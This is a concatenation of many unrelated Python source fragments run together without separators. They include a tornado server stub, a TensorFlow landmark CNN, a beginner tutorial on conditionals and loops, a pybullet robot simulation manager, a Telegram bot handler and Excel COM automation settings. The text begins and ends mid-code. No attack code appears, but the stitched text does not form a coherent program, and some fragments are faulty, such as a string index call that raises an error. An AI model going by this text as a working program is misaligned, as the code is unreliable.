(r'/openoapi/drivermgr/v1/drivers(.*)', driver_handler) ] self.service_entry = {} self.query_service_pat = re.compile(r'/(.+?)/version/(.+)') tornado.web.Application.__init__(self, handlers) pass if __name__ == '__main__': app = openo_app() server = tornado.httpserver.HTTPServer(app) server.listen(8086) tornado.ioloop.IOLoop.instance().start() import argparse import sys import colibris class BaseCommand: PROG = None USAGE = None DESCRIPTION = None EPILOG = None ADD_HELP = True def __init__(self, args): self.args = args self.parser = self.make_argument_parser() self.add_arguments(self.parser) self.initialize() def initialize(self): colibris.setup() def run(self): options = self.parse_arguments(self.parser, self.args) return self.execute(options) def make_argument_parser(self): return argparse.ArgumentParser(prog=self.PROG or self.make_prog(), usage=self.USAGE, description=self.DESCRIPTION, epilog=self.EPILOG, add_help=self.ADD_HELP) def make_prog(self): return '{arg0} {cmd}'.format(arg0=sys.argv[0], cmd=self.get_name()) def add_arguments(self, parser): pass def parse_arguments(self, parser, args): return parser.parse_args(args) def execute(self, options): raise NotImplementedError @classmethod def get_name(cls): return cls.__name__[0:-7].lower() from typing import ( final, List, Type, TypeVar, TYPE_CHECKING, ) from xoa_driver.internals.core.commands import ( P4G_INDICES, P4G_CREATE, P4G_DELETE, P4G_ENABLE, P4G_COMMENT, P4G_CLEAR_COUNTERS, P4G_ROLE, P4G_LP_TIME_SCALE, P4G_LP_SHAPE, P4G_TEST_APPLICATION, P4G_L4_PROTOCOL, ) if TYPE_CHECKING: from xoa_driver.internals.core import interfaces as itf from xoa_driver.internals.utils import kind from xoa_driver.internals.utils.indices import observer as idx_obs from .tls import GTls from .l2 import GL2 from .raw import GRaw from .tcp import GTcp from .udp import GUdp from .replay import GReplay from .l3 import GL3 from .user_state import GUserState from .histogram import GHistogram from ..base_index import BaseIndex class GCounters: def __init__(self, conn: "itf.IConnection", module_id: int, port_id: int, group_idx: int) -> None: self.clear = P4G_CLEAR_COUNTERS(conn, module_id, port_id, group_idx) class GLoadProfile: def __init__(self, conn: "itf.IConnection", module_id: int, port_id: int, group_idx: int) -> None: self.time_scale = P4G_LP_TIME_SCALE(conn, module_id, port_id, group_idx) self.shape = P4G_LP_SHAPE(conn, module_id, port_id, group_idx) CG = TypeVar("CG") @final class ConnectionGroupIdx(BaseIndex): """L47 Connection Group Index Manager""" def __init__(self, conn: "itf.IConnection", kind: "kind.IndicesKind", observer: "idx_obs.IndicesObserver") -> None: super().__init__(conn, kind, observer) self.comment = P4G_COMMENT(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_COMMENT` """ self.status = P4G_ENABLE(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_ENABLE` """ self.role = P4G_ROLE(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_ROLE` """ self.layer4_protocol = P4G_L4_PROTOCOL(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_L4_PROTOCOL` """ self.test_application = P4G_TEST_APPLICATION(self._conn, *kind) """ Representation of :class:`~xoa_driver.internals.core.commands.p4g_commands.P4G_TEST_APPLICATION` """ self.tls = GTls(self._conn, *kind) """TLS configurations.""" self.l2 = GL2(self._conn, *kind) """L2 configurations.""" self.raw = GRaw(self._conn, *kind) """Raw configurations.""" self.tcp = GTcp(self._conn, *kind) """TCP configurations.""" self.udp = GUdp(self._conn, *kind) """UDP configurations.""" self.replay = GReplay(self._conn, *kind) """Replay configurations.""" self.l3 = GL3(self._conn, *kind) """L3 configurations.""" self.user_state = GUserState(self._conn, *kind) """User state configurations.""" self.histogram = GHistogram(self._conn, *kind) """Histogram configurations.""" self.counters = GCounters(self._conn, *kind) """Counters.""" self.load_profile = GLoadProfile(self._conn, *kind) """Load Profile configurations.""" async def delete(self): await P4G_DELETE(self._conn, *self.kind).set() self._observer.notify(idx_obs.IndexEvents.DEL, self) @classmethod async def _fetch(cls, conn: "itf.IConnection", module_id: int, port_id: int) -> List[int]: resp = await P4G_INDICES(conn, module_id, port_id).get() return list(resp.group_identifiers) @classmethod async def _new(cls: Type[CG], conn: "itf.IConnection", kind: "kind.IndicesKind", observer: "idx_obs.IndicesObserver") -> CG: await P4G_CREATE(conn, *kind).set() return cls(conn, kind, observer) from inputs.classes import TflInput from components.digraphs import TemporalDiGraph from plots.plotter import Plotter from plots.circle import Circle from plots.slice import Slice from algorithms.foremost import calculate_foremost_tree tube_input = TflInput(['victoria', 'bakerloo'], ['1600']) tube = TemporalDiGraph('TubeNetwork', data=tube_input) tube.details() # plotter = Plotter() # plotter.single(Slice, tube, slider=False) # plotter.single(Circle, calculate_foremost_tree(tube, 'Holborn')) # plotter.single(Slice, calculate_foremost_tree(tube, 'Holborn')) input("Press enter key to exit...") from ast import Node # ------------------------------------------------------------------------------ class CompilationUnit(Node): attrs = ("package", "imports", "types") class Import(Node): attrs = ("path", "static", "wildcard") class Documented(Node): attrs = ("documentation",) class Declaration(Node): attrs = ("modifiers", "annotations") class TypeDeclaration(Declaration, Documented): attrs = ("name", "body") @property def fields(self): return [decl for decl in self.body if isinstance(decl, FieldDeclaration)] @property def methods(self): return [decl for decl in self.body if isinstance(decl, MethodDeclaration)] @property def constructors(self): return [decl for decl in self.body if isinstance(decl, ConstructorDeclaration)] class PackageDeclaration(Declaration, Documented): attrs = ("name",) class ClassDeclaration(TypeDeclaration): attrs = ("type_parameters", "extends", "implements") class EnumDeclaration(TypeDeclaration): attrs = ("implements",) class InterfaceDeclaration(TypeDeclaration): attrs = ("type_parameters", "extends",) class AnnotationDeclaration(TypeDeclaration): attrs = () # ------------------------------------------------------------------------------ class Type(Node): attrs = ("name", "dimensions",) class BasicType(Type): attrs = () class ReferenceType(Type): attrs = ("arguments", "sub_type") class TypeArgument(Node): attrs = ("type", "pattern_type") # ------------------------------------------------------------------------------ class TypeParameter(Node): attrs = ("name", "extends") # ------------------------------------------------------------------------------ class Annotation(Node): attrs = ("name", "element") class ElementValuePair(Node): attrs = ("name", "value") class ElementArrayValue(Node): attrs = ("values",) # ------------------------------------------------------------------------------ class Member(Documented): attrs = () class MethodDeclaration(Member, Declaration): attrs = ("type_parameters", "return_type", "name", "parameters", "throws", "body") class FieldDeclaration(Member, Declaration): attrs = ("type", "declarators") class ConstructorDeclaration(Declaration, Documented): attrs = ("type_parameters", "name", "parameters", "throws", "body") # ------------------------------------------------------------------------------ class ConstantDeclaration(FieldDeclaration): attrs = () class ArrayInitializer(Node): attrs = ("initializers",) class VariableDeclaration(Declaration): attrs = ("type", "declarators") class LocalVariableDeclaration(VariableDeclaration): attrs = () class VariableDeclarator(Node): attrs = ("name", "dimensions", "initializer") class FormalParameter(Declaration): attrs = ("type", "name", "varargs") class InferredFormalParameter(Node): attrs = ('name',) # ------------------------------------------------------------------------------ class Statement(Node): attrs = ("label",) class IfStatement(Statement): attrs = ("condition", "then_statement", "else_statement") class WhileStatement(Statement): attrs = ("condition", "body") class DoStatement(Statement): attrs = ("condition", "body") class ForStatement(Statement): attrs = ("control", "body") class AssertStatement(Statement): attrs = ("condition", "value") class BreakStatement(Statement): attrs = ("goto",) class ContinueStatement(Statement): attrs = ("goto",) class ReturnStatement(Statement): attrs = ("expression",) class ThrowStatement(Statement): attrs = ("expression",) class SynchronizedStatement(Statement): attrs = ("lock", "block") class TryStatement(Statement): attrs = ("resources", "block", "catches", "finally_block") class SwitchStatement(Statement): attrs = ("expression", "cases") class BlockStatement(Statement): attrs = ("statements",) class StatementExpression(Statement): attrs = ("expression",) # ------------------------------------------------------------------------------ class TryResource(Declaration): attrs = ("type", "name", "value") class CatchClause(Statement): attrs = ("parameter", "block") class CatchClauseParameter(Declaration): attrs = ("types", "name") # ------------------------------------------------------------------------------ class SwitchStatementCase(Node): attrs = ("case", "statements") class ForControl(Node): attrs = ("init", "condition", "update") class EnhancedForControl(Node): attrs = ("var", "iterable") # ------------------------------------------------------------------------------ class Expression(Node): attrs = () class Assignment(Expression): attrs = ("expressionl", "value", "type") class TernaryExpression(Expression): attrs = ("condition", "if_true", "if_false") class BinaryOperation(Expression): attrs = ("operator", "operandl", "operandr") class Cast(Expression): attrs = ("type", "expression") class MethodReference(Expression): attrs = ("expression", "method", "type_arguments") class LambdaExpression(Expression): attrs = ('parameters', 'body') # ------------------------------------------------------------------------------ class Primary(Expression): attrs = ("prefix_operations", "postfix_operations", "qualifier", "selectors") class Literal(Primary): attrs = ("value",) class This(Primary): attrs = () class MemberReference(Primary): attrs = ("member",) class Invocation(Primary): attrs = ("type_arguments", "arguments") class ExplicitConstructorInvocation(Invocation): attrs = () class SuperConstructorInvocation(Invocation): attrs = () class MethodInvocation(Invocation): attrs = ("member",) class SuperMethodInvocation(Invocation): attrs = ("member",) class SuperMemberReference(Primary): attrs = ("member",) class ArraySelector(Expression): attrs = ("index",) class ClassReference(Primary): attrs = ("type",) class VoidClassReference(ClassReference): attrs = () # ------------------------------------------------------------------------------ class Creator(Primary): attrs = ("type",) class ArrayCreator(Creator): attrs = ("dimensions", "initializer") class ClassCreator(Creator): attrs = ("constructor_type_arguments", "arguments", "body") class InnerClassCreator(Creator): attrs = ("constructor_type_arguments", "arguments", "body") # ------------------------------------------------------------------------------ class EnumBody(Node): attrs = ("constants", "declarations") class EnumConstantDeclaration(Declaration, Documented): attrs = ("name", "arguments", "body") class AnnotationMethod(Declaration): attrs = ("name", "return_type", "dimensions", "default") Hackerrank/Project Euler - Python/euler006.py0 #!/bin/python3 """ Author: e-mail: website: https://rishabhrkaushik.github.io Purpose: This is part of the series to the solution to Project Euler. Problem Statement: https://www.hackerrank.com/contests/projecteuler/challenges/euler006/problem """ import sys t = int(input().strip()) for a0 in range(t): n = int(input().strip()) # sum of first n natural number squared - sum of square of first n natural number diff = (n*(n+1)/2)**2 - ((n**3)/3 + (n**2)/2 + (n/6)) print(int(diff)) from JumpScale import j import time OsisBaseObject=j.core.osis.getOsisBaseObjectClass() class Alert(OsisBaseObject): """ alert object history = [{'user':'hamdy', 'state':'ACCEPTED', 'epoch':123, 'comment':''}, {'user':'hamdy', 'state':'RESOLVED', 'epoch':123, 'comment':''}] """ ALLOWED_STATES = ["NEW","ALERT", 'ACCEPTED', 'RESOLVED', 'UNRESOLVED', 'CLOSED'] def __init__(self, ddict={}, gid=0, nid=0, guid="", aid=0, jid=0, masterjid=0, epoch=0, errormessage="", errormessagePub="", description="", descriptionpub="", level=1, category="", tags="", inittime=0,#first time there was an error condition linked to this alert lasttime=0,#last time there was an error condition linked to this alert closetime=-1,#alert is closed, no longer active transactionsinfo="", slabreach=0, history=[], state='NEW', assigned_user=None, eco=None): self.guid = None if ddict <> {}: self.load(ddict) else: if guid=="": self.guid=j.base.idgenerator.generateGUID() else: self.guid=guid self.id = self.guid self.gid = gid self.nid = nid self.description=description self.descriptionpub=descriptionpub self.level=level #1:critical, 2:warning, 3:info self.category=category #dot notation e.g. machine.start.failed self.tags=tags #e.g. machine:2323 self.inittime = inittime #first time there was an error condition linked to this alert self.lasttime = lasttime #last time there was an error condition linked to this alert self.closetime= closetime #alert is closed, no longer active self.nrerrorconditions=1 #nr of times this error condition happened self.errorconditions=[] #ids of errorconditions self.assigned_user = assigned_user self.update_state(state) #["NEW","ALERT", 'ACCEPTED', 'RESOLVED', 'UNRESOLVED', 'CLOSED'] self.lasttime=0 #last time there was an error condition linked to this alert self.closetime=0 #alert is closed, no longer active self.occurrences=1 #nr of times this error condition happened self.slabrach = slabreach self.history = history self.eco = eco self.aid = aid self.jid = jid self.masterjid = masterjid self.epoch = epoch self.errormessage = errormessage self.errormessagePub = errormessagePub def _check_state(self, state): if not state in self.ALLOWED_STATES: raise RuntimeError('Invalid state -- allowed states are %s' % self.ALLOWED_STATES) def _check_history_item(self, history_item): for item in ['user', 'state', 'epoch', 'comment']: if not item in history_item: raise RuntimeError('Invalid history item -- missing %s' % item) def update_state(self, state): self._check_state(state) self.state = state self.epoch = time.time() def update_history(self, history_item): self._check_history_item(history_item) self.history.insert(0, history_item) self.assigned_user = history_item['user'] self.epoch = time.time() def pprint_history(self): import pprint pp = pprint.PrettyPrinter(indent=4) pp.pprint(self.history) def getSetGuid(self): """ use osis to define & set unique guid (sometimes also id) """ if not self.guid: self.guid = j.base.idgenerator.generateGUID() self.id = self.guid return self.guid A=5 B=' ' C=B.index('m') print(C) print(B[0]) print("Heloo ")''' Convolutional Neural Network for Fashion Landmarks Detection. for COMP592 Project due 20th of April ''' import tensorflow.compat.v1 as tf class LandmarkModel(object): def __init__(self, output_size): self.output_size = output_size def __call__(self, input_tensor): # |== Layer 0: input layer ==| # Input feature x should be of shape (batch_size, image_width, image_height, color_channels). inputs = tf.cast(input_tensor, tf.float32) # |== Layer 1 ==| with tf.variable_scope('layer1'): # Convolutional layer # Computes 32 features using a 3x3 filter with ReLU activation. conv1 = tf.layers.conv2d(inputs=inputs, filters=32, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 2 ==| with tf.variable_scope('layer2'): conv2 = tf.layers.conv2d(inputs=pool1, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv3 = tf.layers.conv2d(inputs=conv2, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool2 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 3 ==| with tf.variable_scope('layer3'): conv4 = tf.layers.conv2d(inputs=pool2, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv5 = tf.layers.conv2d(inputs=conv4, filters=64, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool3 = tf.layers.max_pooling2d(inputs=conv5, pool_size=[2, 2], strides=(2, 2), padding='SAME') # |== Layer 4 ==| with tf.variable_scope('layer4'): conv6 = tf.layers.conv2d(inputs=pool3, filters=128, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) conv7 = tf.layers.conv2d(inputs=conv6, filters=128, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) pool4 = tf.layers.max_pooling2d(inputs=conv7, pool_size=[2, 2], strides=(1, 1), padding='SAME') # |== Layer 5 ==| with tf.variable_scope('layer5'): conv8 = tf.layers.conv2d(inputs=pool4, filters=256, kernel_size=[3, 3], strides=(1, 1), padding='SAME', activation=tf.nn.relu) # |== Layer 6 ==| with tf.variable_scope('layer6'): # Flatten tensor into a batch of vectors flatten = tf.layers.flatten(inputs=conv8) dense1 = tf.layers.dense(inputs=flatten, units=1024, activation=tf.nn.relu, use_bias=True) logits = tf.layers.dense(inputs=dense1, units=self.output_size, activation=None, use_bias=True, name="logits") logits = tf.identity(logits, 'final_dense') return logits """ Day 2: Boolean variables, conditionals, control structures, loops """ int_var = 1 frac_var = 2.333333 string_var = "Hello class hope you are doing well!" print(int_var) print(frac_var) print(string_var) ''' Boolean variables/ bool They can only have one of 2 values True or False Logical operators and operator or operator xor operator not operator binary and unary operators Binary operator - works on 2 operand Unary operator - works on 1 operand logical_operator - boolean expression which gives boolean value ''' bool_var_1 = True bool_var_2 = False print(bool_var_1) print(bool_var_2) # == - equality operator, it is a binary operator. checks if the value on both sides are equal print(1 == 2) print(1 == 1) var_1 = 2.4 var_2 = 2.4 print(var_1 == var_2) # > - greater than operator - checks if the value on LHS is greater than RHS # < - less than operator - checks if the value on LSH is less than RHS var_1 = 2.4 var_2 = 2.4 print(var_1 > var_2) var_1 = 2.44 var_2 = 2.46 print(var_1 < var_2) # >= - greater than or equal to operator - checks if the value on LHS is greater than or equal to RHS # <= - less than or equal to operator - checks if the value on LSH is less than or equal to RHS var_1 = 123 var_2 = 123 print(var_1 >= var_2) var_1 = 456 var_2 = 789 print(var_1 <= var_2) # not operator - logical not. flips the boolean value expression_1 = 123 == 123 print(not expression_1) # '!' equals operator - checks if one value is not equal to the other expression_1 = 123 != 123 expression_2 = not(123 == 123) print("exp_1 ", expression_1) print("exp_2 ", expression_2) # and operator - True only if LHS and RHS are true, else results in false print("----------------------------------------") expression_1 = True and True print(expression_1) expression_1 = False and True print(expression_1) expression_1 = True and False print(expression_1) expression_1 = False and False print(expression_1) print("----------------------------------------") # or operator - True if either values are true. Only false when both are false print("----------------------------------------") expression_1 = True or True print(expression_1) expression_1 = False or True print(expression_1) expression_1 = True or False print(expression_1) expression_1 = False or False print(expression_1) print("----------------------------------------") print("----------------------------------------") def test(): print("I was called") return 1 == 1 print("----------------------------------------") print("----------------------------------------") # short circuit operators - and & or print("Short circuit happens here------------------------") expression_1 = False and test() print(expression_1) expression_1 = True or test() print(expression_1) print("Short circuit DOES NOT happen here------------------------") expression_1 = True and test() print(expression_1) expression_1 = False or test() print(expression_1) print("----------------------------------------") # xor operator ^ print("----------------------------------------") expression_1 = True ^ True print(expression_1) expression_1 = False ^ True print(expression_1) expression_1 = True ^ False print(expression_1) expression_1 = False ^ False print(expression_1) print("----------------------------------------") ''' Decision making - basically is that you want to control the flow of your code Primary - if else or if elif else if : print() ''' if False: print("Condition was true") print("Another statement") print("----------------------------------------") if True: print("Inside the if block") else: print("Inside the else block") print("----------------------------------------") # example of odd even numbers num = 11 if num % 2 == 0: print("Number is even") else: print("Number is odd") print("----------------------------------------") # if-elif ladder ''' ''' titanic_available = False tanhaji_available = True two_states_available = True spiderman_available = True golmaal_available = True if titanic_available: print("Tickets for titanic are available") elif tanhaji_available: print("Tickets for tanhaji are available") elif two_states_available: print("Tickets for two_states are available") elif spiderman_available: print("Tickets for spiderman are available") elif golmaal_available: print("Tickets for golmaal are available") else: print("No tickets are available") print("----------------------------------------") if titanic_available: print("Tickets for titanic are available") if tanhaji_available: print("Tickets for tanhaji are available") if two_states_available: print("Tickets for two_states are available") if spiderman_available: print("Tickets for spiderman are available") if golmaal_available: print("Tickets for golmaal are available") else: print("No tickets are available") print("----------------------------------------") # Nested if else td_available = True if titanic_available: if td_available: print("Titanic is available in 3d") else: print("Titanic is available, but not in 3d") else: print("Titanic is not available") if titanic_available or tanhaji_available: print("Booking a ticket for a movie") else: print("Did not find tickets for desired movie") # example of logical operator chaining if tanhaji_available or golmaal_available or spiderman_available: print("Booking a ticket for a movie") else: print("Did not find tickets for desired movie") print("----------------------------------------") # BODMAS or PEDMAS ''' B- brackets O - of Div/Mult - similar hierarchy Add/Sub - similar hierarchy ''' print(5 * 2 + 8) print(5 * (2 + 8)) rice_available = True spices_available = False chicken_available = True lamb_available = False peas_available = True carrots_available = True mushrooms_available = True # chaining of logical operators and use of brackets for grouping expressions if (rice_available and spices_available and ( ( chicken_available or lamb_available or ( peas_available and carrots_available and mushrooms_available ) ) ) ): print("Biryani can be made") else: print("Biryani can not be made") print("----------------------------------------") ''' Loops - what are they? When we want execute a certain instructions multiple times, then we use loops Python - 2 types of loops for while In other languages like JAVA C++ C C# etc for while do while ''' # while : # write statements here counter = 10 while counter >= 0: print("Current counter value is ", counter) counter = counter - 1 print("Loop over") print("----------------------------------------") # Loop control statements - continue and break counter = 10 while True: if counter < 0: break print("Current counter value is ", counter) counter = counter - 1 print("----------------------------------------") counter = 10 while counter >= 0: if counter % 2 == 0: counter = counter - 1 continue print("Current counter value is ", counter) counter = counter - 1 print("Loop over") print("----------------------------------------") # function range # range(10) - generate numbers from 0-9 # for loop - for iteration_variable in [collection]: # print("For loop example --------") for num in range(10): print(num) print("For loop example --------") # range(stop_number) - uniformly spaced integers between 0 and stop_number in steps of 1 # range(start_number, stop_number) - uniformly spaced integers between start_number and stop_number in steps of 1 # range(start_number, stop_number, step_number) print("range(stop_number) example-=---------") for num in range(10): print(num) print("range(start_number, stop_number) example-=---------") for num in range(4, 12): print(num) print("range(start_number, stop_number, step_number) example-=---------") for num in range(5, 26, 3): print(num) #!/usr/bin/env python # coding: utf-8 import time import pybullet import threading import pybullet_data from qibullet.laser import Laser from qibullet.camera import Camera from qibullet.pepper_virtual import PepperVirtual from qibullet.base_controller import BaseController class SimulationManager: """ Class allowing to handle the different parameters of a pybullet simulation """ def __init__(self): """ Constructor """ pass def launchSimulation(self, gui=True): """ Launches a simulation instance Parameters: gui - Boolean, if True the simulation is launched with a GUI, and with no GUI otherwise Returns: physics_client - The id of the simulation client created """ if gui: physics_client = pybullet.connect(pybullet.GUI) pybullet.setRealTimeSimulation(1, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_RGB_BUFFER_PREVIEW, 0, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_DEPTH_BUFFER_PREVIEW, 0, physicsClientId=physics_client) pybullet.configureDebugVisualizer( pybullet.COV_ENABLE_SEGMENTATION_MARK_PREVIEW, 0, physicsClientId=physics_client) else: physics_client = pybullet.connect(pybullet.DIRECT) threading.Thread( target=self._stepSimulation, args=[physics_client]).start() pybullet.setGravity(0, 0, -9.81, physicsClientId=physics_client) return physics_client def resetSimulation(self, physics_client): """ Resets the simulated instance corresponding to the physics client id. All of the objects loaded in the simulation will be destroyed, but the instance will still be running """ self._clearInstance(physics_client) pybullet.resetSimulation(physicsClientId=physics_client) def stopSimulation(self, physics_client): """ Stops the simulated instance corresponding to the physics_client id Parameters: physics_client - The id of the simulated instance to be stopped """ self._clearInstance(physics_client) pybullet.disconnect(physicsClientId=physics_client) def spawnPepper( self, physics_client, translation=[0, 0, 0], quaternion=[0, 0, 0, 1], spawn_ground_plane=False): """ Loads a Pepper model in the simulation Parameters: physics_client - The id of the simulated instance in which the robot is supposed to be spawned translation - List containing 3 elements, the spawning translation [x, y, z] in the WORLD frame quaternions - List containing 4 elements, the spawning rotation as a quaternion [x, y, z, w] in the WORLD frame spawn_ground_plane - If True, the pybullet_data ground plane will be spawned Returns: pepper - A PepperVirtual object, the Pepper simulated instance """ pepper = PepperVirtual() if spawn_ground_plane: pybullet.setAdditionalSearchPath(pybullet_data.getDataPath()) pybullet.loadMJCF( "mjcf/ground_plane.xml", physicsClientId=physics_client) pepper.loadRobot( translation, quaternion, physicsClientId=physics_client) return pepper def removePepper(self, pepper_virtual): """ Removes a Pepper from a simulated instance Parameters: pepper_virtual - The virtual Pepper robot to be removed """ pepper_virtual.laser_manager._terminateScan() pepper_virtual.base_controller._terminateController() pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_TOP) pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_BOTTOM) pepper_virtual.unsubscribeCamera(PepperVirtual.ID_CAMERA_DEPTH) pybullet.removeBody(pepper_virtual.robot_model) def _clearInstance(self, physics_client): """ INTERNAL METHOD, Called to kill the processes running in a simulated instance, before resetting or stopping it. Parameters: physics_client - The client id of the simulated instance that will be cleared """ for laser in Laser._getInstances(): if laser.physics_client == physics_client: laser._terminateScan() for camera in Camera._getInstances(): if camera.physics_client == physics_client: camera._resetActiveCamera() for controller in BaseController._getInstances(): controller._terminateController() def _stepSimulation(self, physics_client): """ INTERNAL METHOD: This method is only used for a simulation in DIRECT mode (without the gui). Parameters: physics_client - The id of the simulated instance to be stepped """ try: while True: pybullet.stepSimulation(physicsClientId=physics_client) time.sleep(1./240.) except Exception: pass import logging from telegram import Update, User from telegram.ext import Updater, Dispatcher, CommandHandler, CallbackContext logger = logging.getLogger(__name__) MSG = ( "Would you like to make PR for this?\n" "You can start by forking me at https://github.com/vldc-hq/vldc-bot\n" "💪😎" ) def add_pr(upd: Updater, handlers_group: int): logger.info("registering PR handler") dp: Dispatcher = upd.dispatcher dp.add_handler(CommandHandler("pr", _pr, run_async=True), handlers_group) def _pr(update: Update, context: CallbackContext): user: User = ( update.message.reply_to_message.from_user if update.message.reply_to_message else None ) msg = f"@{user.username} " + MSG if user else MSG context.bot.send_message(update.effective_chat.id, msg) """ Typical hierarchy for Microsoft Excel is Excel Application > Workbooks > Workbook > Sheet. https://docs.microsoft.com/en-us/office/vba/api/excel.workbook """ import os import sys import atexit import signal import win32com.client from .prop_utils import ProxyProperty, ProxyMethod, HashDict, ItemStorage from .fields import ConstantItem __all__ = ['Excel', 'Workbook', 'should_init_sig', 'set_init_sig', 'init_sig_shutdown', 'shutdown'] def is_gencache_available(): """Determine if make_py has been run (i.e. early binding is setup). Early binding helps get class/object documentation in development. """ return win32com.client.gencache.GetClassForProgID('Excel.Application') is not None def init_gencache(): """Initialize the gencache for early binding.""" if not is_gencache_available(): try: # Create the gencache application and delete it gen = win32com.client.gencache.EnsureDispatch('Excel.Application') gen.Quit() del gen except (AttributeError, TypeError, ValueError, Exception): pass # Call init gencache. Required for constants! init_gencache() SETTINGS = { 'is_parallel': True, # Custom setting # 'ActiveCell': None, # 'ActiveChart': None, # 'ActiveEncryptionSession': -1, # 'ActivePrinter': "", # 'ActiveProtectedViewWindow': None, # 'ActiveSheet': None, # 'ActiveWindow': None, # 'ActiveWorkbook': None, 'AlertBeforeOverwriting': True, 'AltStartupPath': "", 'AlwaysUseClearType': False, 'AskToUpdateLinks': False, 'AutoFormatAsYouTypeReplaceHyperlinks': True, 'AutomationSecurity': 3, # Optimized for load time 'AutoPercentEntry': True, # 'Calculation': constants.xlCalculationAutomatic, # 'CalculateBeforeSave': False, 'CalculationInterruptKey': 2, # 'CalculationState': 0, # 'CalculationVersion': 181029, # 'Caller': -2146826265, # 'CanPlaySounds': True, # 'CanRecordSounds': True, 'Caption': "Excel", 'CellDragAndDrop': True, # 'Cells': None, 'ChartDataPointTrack': True, # 'Charts': None, 'ClusterConnector': "", # 'Columns': None, 'CommandUnderlines': -4105, # 'ConstrainNumeric': False, 'CopyObjectsWithCells': True, # 'Creator': 1480803660, 'Cursor': -4143, 'CutCopyMode': 0, # 'DataEntryMode': -4146, 'DecimalSeparator': ".", 'DefaultSaveFormat': 51, 'DefaultSheetDirection': -5003, 'DeferAsyncQueries': False, 'DisplayAlerts': False, # Optimized for load time 'DisplayClipboardWindow': False, 'DisplayCommentIndicator': -1, # 'DisplayDocumentActionTaskPane': False, 'DisplayDocumentInformationPanel': False, 'DisplayExcel4Menus': False, 'DisplayFormulaAutoComplete': True, 'DisplayFormulaBar': True, 'DisplayFullScreen': False, 'DisplayFunctionToolTips': True, 'DisplayInsertOptions': True, 'DisplayNoteIndicator': True, 'DisplayPasteOptions': True, 'DisplayRecentFiles': True, 'DisplayScrollBars': True, 'DisplayStatusBar': True, 'EditDirectlyInCell': True, 'EnableAnimations': True, 'EnableAutoComplete': True, 'EnableCancelKey': 1, 'EnableCheckFileExtensions': True, 'EnableEvents': True, 'EnableLargeOperationAlert': True, 'EnableLivePreview': True, 'EnableMacroAnimations': False, 'EnableSound': False, # 'Excel4IntlMacroSheets': None, # 'Excel4MacroSheets': None, 'ExtendList': True, 'FeatureInstall': 0, # 'FileConverters': None, 'FileValidation': 0, 'FileValidationPivot': 0, 'FixedDecimal': False, 'FixedDecimalPlaces': 2, 'FlashFill': True, 'FlashFillMode': False, 'FormulaBarHeight': 1, 'GenerateGetPivotData': False, 'GenerateTableRefs': 1, 'HighQualityModeForGraphics': False, # 'Hinstance': 16384000, # 'HinstancePtr': 16384000, # 'Hwnd': 1051558, 'IgnoreRemoteRequests': False, 'Interactive': False, # Optimized for load time # 'IsSandboxed': False, # 'Iteration': -2146826246, 'LargeOperationCellThousandCount': 33554, # 'MailSession': None, 'MapPaperSize': True, # 'MathCoprocessorAvailable': True, # 'MaxChange': -2146826246, # 'MaxIterations': -2146826246, 'MeasurementUnit': 0, 'MergeInstances': True, # 'MouseAvailable': True, 'MoveAfterReturn': True, 'MoveAfterReturnDirection': -4121, # 'Names': None, # 'NetworkTemplatesPath': "", 'ODBCTimeout': 45, 'OnWindow': None, # 'OrganizationName': "", # 'PathSeparator': "\\", 'PivotTableSelection': False, # 'PreviousSelections': None, 'PrintCommunication': False, # Optimized for load time 'PromptForSummaryInfo': False, # 'Ready': True, # 'RecordRelative': False, 'ReferenceStyle': 1, # 'RegisteredFunctions': None, 'RollZoom': False, # 'Rows': None, 'ScreenUpdating': False, # Optimized for load time # 'Selection': None, # 'Sheets': None, 'ShowChartTipNames': True, 'ShowChartTipValues': True, 'ShowDevTools': True, 'ShowMenuFloaties': True, 'ShowQuickAnalysis': True, 'ShowSelectionFloaties': False, 'ShowStartupDialog': False, 'ShowToolTips': True, 'StandardFont': "Calibri", 'StatusBar': False, # Optimized for load time # 'ThisCell': None, # 'ThisWorkbook': None, 'ThousandsSeparator': ",", # 'TransitionMenuKey': "/", # 'TransitionNavigKeys': False, 'UseClusterConnector': False, # 'UseClusterConnector': False, 'UserControl': False, 'UseSystemSeparators': True, # 'Value': "Microsoft Excel", # 'VBE': None, 'Visible': False, 'WarnOnFunctionNameConflict': False, # 'WindowsForPens': False, 'WindowState': -4143, # 'Worksheets': None, } def compare_xl_com(xl_com, settings): """Return if the given xl_com object has all of the same settings.""" if not isinstance(xl_com, dict): xl_com = get_xl_com_settings(xl_com) return xl_com == settings def get_xl_com_settings(xl, **settings): """Get the current settings.""" values = {} for k in SETTINGS: obj = getattr(xl, k, None) if isinstance(getattr(Excel, k, None), ProxyMethod): # Get the value from the method values[k] = obj() else: # Get the value from the property values[k] = obj # Update with the given settings values.update(settings) return values def set_xl_com_settings(xl, **settings): """Set the given attribute settings.""" # Set the given attributes for k, v in settings.items(): try: # Set the property setattr(xl, k, v) except (AttributeError, Exception) as err: try: # Call the setter method if str(err).startswith(Excel.METHOD_SETTER_ERROR): func = getattr(xl, k, None) if callable(func): func(v) except (AttributeError, TypeError, ValueError, Exception): raise err def get_xl_com_for_settings(**xl_settings): """Create or return a global excel object to minimize the number of existing excel objects.""" # Get the settings with defaults settings = 